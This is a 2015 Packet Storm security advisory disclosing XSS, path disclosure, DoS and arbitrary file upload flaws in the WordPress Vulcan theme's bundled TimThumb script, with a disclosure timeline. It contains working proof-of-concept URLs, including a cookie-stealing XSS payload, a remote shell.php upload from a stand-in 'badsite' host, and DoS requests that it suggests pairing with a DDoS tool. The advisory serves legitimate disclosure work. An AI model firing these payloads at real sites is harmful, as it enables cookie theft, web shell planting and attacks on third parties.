WordPress Vulcan Theme XSS / Disclosure/ DoS

2015-07-06T00:00:00
ID PACKETSTORM:132579
Type packetstorm
Reporter MustLive
Modified 2015-07-06T00:00:00

Description

                                        
                                            `Hello list!  
  
Let's back to vulnerabilities, which I disclosed in April 2011, which can be   
used for DDoS attacks on other sites, e.g. with my DAVOSET   
(http://seclists.org/fulldisclosure/2015/Jun/111). In addition to hundreds   
of themes, which I wrote about in previous years, here is another theme for   
WordPress, which still didn't fix all holes and there are many sites with   
old version of theme (+ WAF bypass).  
  
I want to warn you about multiple vulnerabilities in Vulcan theme for   
WordPress. This is commercial theme for WP.  
  
These are Cross-Site Scripting, Full path disclosure, Abuse of   
Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.  
  
In 2011 I wrote about Cross-Site Scripting, Full path disclosure, Abuse of   
Functionality and Denial of Service vulnerabilities in TimThumb and multiple   
themes for WordPress (http://seclists.org/fulldisclosure/2011/Apr/227), and   
later also was disclosed Arbitrary File Uploading vulnerability.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are all versions of Vulcan theme for WordPress (in last versions   
there were fixed only vulnerabilities in TimThumb, but there are still FPD   
in other php-files).  
  
Since version TimThumb 2.8 all vulnerabilities are fixed (in timthumb.php).   
But AoF and DoS holes are fixed by disabling external hosts by default. If   
to change settings (to allow individual or all external hosts), which is   
allowed by software, then it's possible to conduct attacks on other sites.   
E.g. with using of DAVOSET.  
  
WAF bypass:  
  
At many sites unfixed version of TimThumb in theme is used, but they protect   
themselves using WAF (such as ModSecurity). Note, that WAF doesn't protect   
against FPD holes in this theme and TimThumb, and in some cases it doesn't   
protect against AoF and DoS.  
  
----------  
Details:  
----------  
  
XSS (WASC-08) (in old versions TimThumb):  
  
http://site/wp-content/themes/vulcan/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg  
  
Full path disclosure (WASC-13):  
  
http://site/wp-content/themes/vulcan/timthumb.php?src=1  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1&w=1111111  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1111111&w=1  
  
Abuse of Functionality (WASC-42):  
  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site&h=1&w=1  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com&h=1&w=1   
(bypass of restriction on domain, if such restriction is turned on)  
  
DoS (WASC-10):  
  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/big_file&h=1&w=1  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/big_file&h=1&w=1   
(bypass of restriction on domain, if such restriction is turned on)  
  
About such Abuse of Functionality and Denial of Service vulnerabilities you   
can read in my article Using of the sites for attacks on other sites   
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).  
  
Arbitrary File Upload (WASC-31) (in old versions of TimThumb):  
  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/shell.php  
  
Full path disclosure (WASC-13):  
  
http://site/wp-content/themes/vulcan/  
  
Besides index.php there are also potentially FPD in other php-files of this   
theme.  
  
------------  
Timeline:  
------------  
  
2011.02.01 - informed developers from WooThemes about holes in their themes.  
2011.02.04-12 - conversation about fixing holes in all their themes for WP.  
2011.02.07 - announced at my site.  
2011.02.08 - informed developer of TimThumb.  
2011.02.13 - developer of TimThumb released version 1.25.  
2011.02.13 - developers from WooThemes begun updating TimThumb in all their   
themes.  
2011.04.13 - disclosed at my site about TimThumb and multiple themes.  
2015.07.02 - disclosed at my site about Vulcan theme.  
  
I mentioned about these vulnerabilities at my site   
(http://websecurity.com.ua/7850/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
`